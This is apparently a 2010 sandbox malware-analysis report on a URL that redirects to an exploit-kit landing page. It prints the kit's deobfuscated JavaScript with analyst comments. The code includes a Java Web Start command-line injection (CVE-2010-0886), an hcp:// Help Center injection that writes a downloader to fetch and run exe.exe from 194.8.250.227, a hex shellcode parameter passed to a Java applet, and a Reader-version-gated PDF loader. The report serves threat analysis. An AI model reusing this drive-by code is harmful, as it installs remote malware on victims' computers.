Analysis report for http://85.234.190.13/tds/in.cgi?default
Sample Overview
| URL | http://85.234.190.13/tds/in.cgi?default |
|---|
| MD5 | 63e7a8a467205c6c2d6c078de506b30c |
| Analysis Started | 2010-07-29 01:42:15 |
| Report Generated | 2010-07-29 01:42:34 |
| Jsand version | 1.02.02 |
See the report for domain 85.234.190.13.
Detection results
| Detector | Result |
| Jsand 1.02.02 | malicious |
Exploits
| Name | Description | Reference |
| JWS command-line injection | Java Web Start Arbitrary command-line injection | CVE-2010-0886 |
Deobfuscation results
Evals
No evals.
Writes
<script>function W5S1DtZgV8j(){
// Analyst note: tries to start a Java Web Start payload through the Java
// Deployment Toolkit's launch() method. The argument string appends
// "-J-jar -J\\91.188.60.234\public\photo1.jpg" to a load.php URL, i.e. the
// JWS command-line injection listed in this report's Exploits table
// (CVE-2010-0886). Any failure falls back to puJqX8Kbftx() below.
if (window.navigator.appName == 'Microsoft Internet Explorer'){
// IE branch: "_ie" variant of the URL; the toolkit is reached via its classid.
// The classid string is a stable indicator for detection rules.
var Jk6IaoriiHH = 'http://194.8.250.227/bomj/load.php?spl=java_dt' + '_ie' +
' -J-jar -J\\\\91.188.60.234\\public\\photo1.jpg none';
try {
var d758gkdoT4Y = document.createElement('OBJECT');
d758gkdoT4Y.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA';
d758gkdoT4Y.launch(Jk6IaoriiHH);
}
catch (Lpk74w1ml7q){
// launch() unavailable or refused: fall back to the <object>/<embed> variant.
puJqX8Kbftx();
}
}
else {
// Non-IE branch: "_ff" variant; two OBJECTs are created because the toolkit
// plug-in has been exposed under both MIME types below.
var Jk6IaoriiHH = 'http://194.8.250.227/bomj/load.php?spl=java_dt' + '_ff' +
' -J-jar -J\\\\91.188.60.234\\public\\photo1.jpg none';
var tM9NDq7V8HL = document.createElement('OBJECT');
var FOOoPAZV2nc = document.createElement('OBJECT');
tM9NDq7V8HL.type = 'application/npruntime-scriptable-plugin;deploymenttoolkit';
FOOoPAZV2nc.type = 'application/java-deployment-toolkit';
document.body.appendChild(tM9NDq7V8HL);
document.body.appendChild(FOOoPAZV2nc);
try {
tM9NDq7V8HL.launch(Jk6IaoriiHH);
}
catch (Lpk74w1ml7q){
try {
FOOoPAZV2nc.launch(Jk6IaoriiHH);
}
catch (Lpk74w1ml7q){
// Both MIME-type variants failed: same fallback as the IE branch.
puJqX8Kbftx();
}
}
}
}
function puJqX8Kbftx(){
// Analyst note: fallback when the Deployment Toolkit launch() call fails.
// Writes a zero-size element whose launchjnlp parameter carries the same
// "-J-jar -J\\91.188.60.234\public\photo1.jpg" argument and whose docbase
// points at load.php?spl=java_ws_ie / java_ws_ff, so the browser's Java
// plug-in performs the launch instead. The string literals passed to
// document.write() appear line-wrapped by the report rendering; in the
// original script each is a single line.
if (window.navigator.appName == 'Microsoft Internet Explorer'){
// IE: <object> with the Java plug-in classid 8AD9C840-044E-11D1-B3E9-00805F499D93.
document.write('
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM n
ame="launchjnlp" value="-J-jar -J\\\\91.188.60.234\\public\\photo1.jpg none"><PARAM name="
docbase" value="http://194.8.250.227/bomj/load.php?spl=java_ws' + '_ie' + '"></object>');
}
else {
// Other browsers: <embed type="application/x-java-applet"> with the same attributes.
document.write('
<embed type="application/x-java-applet" width="0" height="0" launchjnlp="-J-jar -J\\\\91.1
88.60.234\\public\\photo1.jpg none" docbase="http://194.8.250.227/bomj/load.php?spl=java_w
s' + '_ff' + '"></embed>');
}
}
// Entry point: the Java Deployment Toolkit attempt runs as soon as this written script executes.
W5S1DtZgV8j();
</script>
(repeated 1 time)
<script>var l5LnO0Ago76ADyWmWw = 'http://194.8.250.227/bomj/helpctrall.asx';
// Analyst note: second stage pulls helpctrall.asx from the same host. In IE it
// creates an OBJECT with classid 6BF52A52-394A-11d3-B153-00C04F79FAA6 and calls
// openPlayer() on it (recorded under "ActiveX controls" in this report); the
// .asx extension and openPlayer() suggest a media player control, confirm
// against the classid. Other browsers get an IFRAME with the same src.
if (window.navigator.appName == 'Microsoft Internet Explorer'){
var EgzKg1OsE6SjZBnvzC = document.createElement('OBJECT');
EgzKg1OsE6SjZBnvzC.setAttribute('classid', 'clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6'
);
EgzKg1OsE6SjZBnvzC.openPlayer(l5LnO0Ago76ADyWmWw);
}
else {
// No classid needed here: the URL is simply loaded in a frame.
var EgzKg1OsE6SjZBnvzC = document.createElement('IFRAME');
EgzKg1OsE6SjZBnvzC.setAttribute('src', l5LnO0Ago76ADyWmWw);
document.body.appendChild(EgzKg1OsE6SjZBnvzC);
}
</script>
(repeated 1 time)
<script type="text/javascript">
// Analyst note: writes a 10x10 iframe whose src is an hcp:// (Windows Help
// Center protocol handler) URL. The topic argument is padded with a long run
// of "%A%" sequences, contains a "..%5C..%5C" traversal, and ends in a
// URL-encoded <script defer> that eval()s a Run(...) call. Decoding the
// percent-escapes, the command line writes a small WScript downloader
// (exe.js: XMLHTTP fetch of load.php?spl=helpctr, saved via ADODB.Stream as
// exe.exe and started with WScript.Shell), then deletes exe.js and
// terminates HelpCtr.exe. The .replace() chain at the end restores the
// characters ? & " = (fromCharCode 63/38/34/61) that were substituted with
// __, @, _ and - to survive the URL. The same iframe, already decoded, is
// listed as the next "Writes" entry in this report. The string below is
// line-wrapped by the report rendering.
document.write("
<iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2
528%2522cmd /c cd ../ @@ echo var a-ActiveXObject;var b-new a(WScript.Arguments(0));b.Open
(WScript.Arguments(1),WScript.Arguments(2),WScript.Arguments(3));b.Send(WScript.Arguments(
4));var c-b.responseBody;var d-new a(WScript.Arguments(5));d.Type-WScript.Arguments(6);d.M
ode-WScript.Arguments(7);d.Open();d.Write(c);var e-WScript.Arguments(8);d.SaveToFile(e,2);
var f-new a(WScript.Arguments(9)).Run(e,WScript.Arguments(10)); > exe.js @@ CScript.exe ex
e.js //b //s _Microsoft.XMLHTTP_ _GET_ _http://194.8.250.227/bomj/load.php__spl-helpctr@h-
_ _false_ _null_ _ADODB.Stream_ 1 3 _exe.exe_ _WScript.Shell_ 0 @@ del /f /q exe.js @@ tas
kkill /im /f HelpCtr.exe%2522.replace(/__/g,String.fromCharCode(63)).replace(/@/g,String.f
romCharCode(38)).replace(/_/g,String.fromCharCode(34)).replace(/-/g,String.fromCharCode(61
))%2529%27%29%29%3C/script%3E\" width=\"10\" height=\"10\" hspace=\"0\" vspace=\"0\" frame
border=\"0\" scrolling=\"0\"></iframe>");
</script>
(repeated 1 time)
<iframe src=
"hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript
%20defer%3Eeval%28unescape%28%27Run%2528%2522cmd /c cd ../ @@ echo var a-ActiveXObject;var b-new a(W
Script.Arguments(0));b.Open(WScript.Arguments(1),WScript.Arguments(2),WScript.Arguments(3));b.Send(W
Script.Arguments(4));var c-b.responseBody;var d-new a(WScript.Arguments(5));d.Type-WScript.Arguments
(6);d.Mode-WScript.Arguments(7);d.Open();d.Write(c);var e-WScript.Arguments(8);d.SaveToFile(e,2);var
f-new a(WScript.Arguments(9)).Run(e,WScript.Arguments(10)); > exe.js @@ CScript.exe exe.js //b //s
_Microsoft.XMLHTTP_ _GET_ _http://194.8.250.227/bomj/load.php__spl-helpctr@h-_ _false_ _null_ _ADODB
.Stream_ 1 3 _exe.exe_ _WScript.Shell_ 0 @@ del /f /q exe.js @@ taskkill /im /f HelpCtr.exe%2522.rep
lace(/__/g,String.fromCharCode(63)).replace(/@/g,String.fromCharCode(38)).replace(/_/g,String.fromCh
arCode(34)).replace(/-/g,String.fromCharCode(61))%2529%27%29%29%3C/script%3E" width="10" height="10"
hspace="0" vspace="0" frameborder="0" scrolling="0"></iframe>
(repeated 1 time)
<script>function java_gsb(){
// Analyst note: injects a full-size <applet> (code "AppleT", archive "1.jar")
// carrying a "sc" parameter that is a long hex string. The tail of that hex
// decodes to ASCII "http://194.8.250.227/bomj/load.php?spl=java_gsb&h=", so the
// blob is presumably a loader/shellcode consumed by the applet (the report's
// sandbox reports no shellcode identified, so this is unconfirmed; verify
// against 1.jar). The parameter value is line-wrapped by the report rendering.
var javaelem = document.createElement("applet");
var paramelem = document.createElement("param");
paramelem.setAttribute("name", "sc");
paramelem.setAttribute("value", "
909033c0648b4030780c8b400c8b701cad8b5808eb098b40348d407c8b583c6a445ad1e22be28beceb4f5a5283
ea5689550456578b733c8b74337803f3568b762003f333c9495041ad33ff360fbe140338f27408c1cf0d03fa40
ebef583bf875e55e8b462403c3668b0c488b561c03d38b048a03c35f5e50c38d7d085752b833ca8a5be8a2ffff
ff32c08bf7f2ae4fb8652e6578ab669866abb06c8ae09850686f6e2e646875726c6d54b88e4e0eecff55049350
33c05050568b550483c27f83c2315250b8361a2f70ff55045b33ff5756b898fe8a0eff550457b8efcee060ff55
04687474703a2f2f3139342e382e3235302e3232372f626f6d6a2f6c6f61642e7068703f73706c3d6a6176615f
67736226683d");
// Applet class and jar are fetched relative to the landing page (194.8.250.227/bomj/).
javaelem.setAttribute("code", "AppleT");
javaelem.setAttribute("archive", "1.jar");
javaelem.setAttribute("width", "100%");
javaelem.setAttribute("height", "100%");
javaelem.appendChild(paramelem);
document.body.appendChild(javaelem);
}
// Applet injection is deferred 100 ms; the string form of setTimeout evaluates its argument as code.
setTimeout("java_gsb();", 100);
function pdf_ie(){
// Analyst note: fingerprints the PDF reader plug-in before loading the PDF
// stage. An OBJECT with classid CA8A9780-280D-11CF-A24D-444553540000 (the
// Adobe Reader browser control) is given id "jdf1" and queried through the
// global jdf1.GetVersions(); the second comma-separated field's value after
// "=" is taken as the version. Only versions in [7, 7.1.4), [8, 8.1.7) or
// [9, 9.4) get an iframe to pdf.php on 194.8.250.227. The comparisons are
// lexicographic string comparisons. Every error is swallowed, so browsers
// without the control show nothing.
try {
var pdfObject = document.createElement("OBJECT");
pdfObject.setAttribute("id", "jdf1");
pdfObject.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");
document.body.appendChild(pdfObject);
// jdf1 resolves through IE's named-element globals, not a declared variable.
var ver = jdf1.GetVersions();
ver = ver.split(",");
ver = ver[1].split("=");
ver = ver[1];
if (((ver >= "7") && (ver < "7.1.4")) || ((ver >= "8") && (ver < "8.1.7")) || ((ver >=
"9") && (ver < "9.4"))){
var pdfelement = document.createElement("iframe");
pdfelement.setAttribute("src", "http://194.8.250.227/bomj/pdf.php?h=");
pdfelement.setAttribute("width", 200);
pdfelement.setAttribute("height", 200);
document.body.appendChild(pdfelement);
}
}
catch (e){
// Deliberately silent: an unmatched or missing plug-in leaves no trace.
}
}
// PDF stage is deferred 4 s, after the Java attempts above have run.
setTimeout("pdf_ie();", 4000);
</script>
(repeated 1 time)
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name=
"launchjnlp" value="-J-jar -J\\91.188.60.234\public\photo1.jpg none"><PARAM name="docbase" value=
"http://194.8.250.227/bomj/load.php?spl=java_ws_ie"></object>
(repeated 1 time)
Network Activity
Requests
| URL | Status | Content Type |
| http://85.234.190.13/tds/in.cgi?default | 302 | text/html |
| http://194.8.250.227/bomj/ | 200 | text/html |
Redirects
| From | To |
| http://85.234.190.13/tds/in.cgi?default | http://194.8.250.227/bomj/ |
ActiveX controls
-
| CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA |
|
Name |
Arg0 |
Count |
| Methods |
launch |
http://194.8.250.227/bomj/load.php?spl=java_dt_ie -J-jar -J\\91.188.60.234\public\photo1.jpg none |
1 |
-
| 6BF52A52-394A-11D3-B153-00C04F79FAA6 |
|
Name |
Arg0 |
Count |
| Methods |
openPlayer |
http://194.8.250.227/bomj/helpctrall.asx |
1 |
Shellcode and Malware
No shellcode was identified.
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://194.8.250.227/bomj/helpctrall.asx |
N/A |
N/A |
|
| http://194.8.250.227/bomj/load.php?spl=java_dt_ie -J-jar -J\\91.188.60.234\public\photo1.jpg none |
N/A |
N/A |
|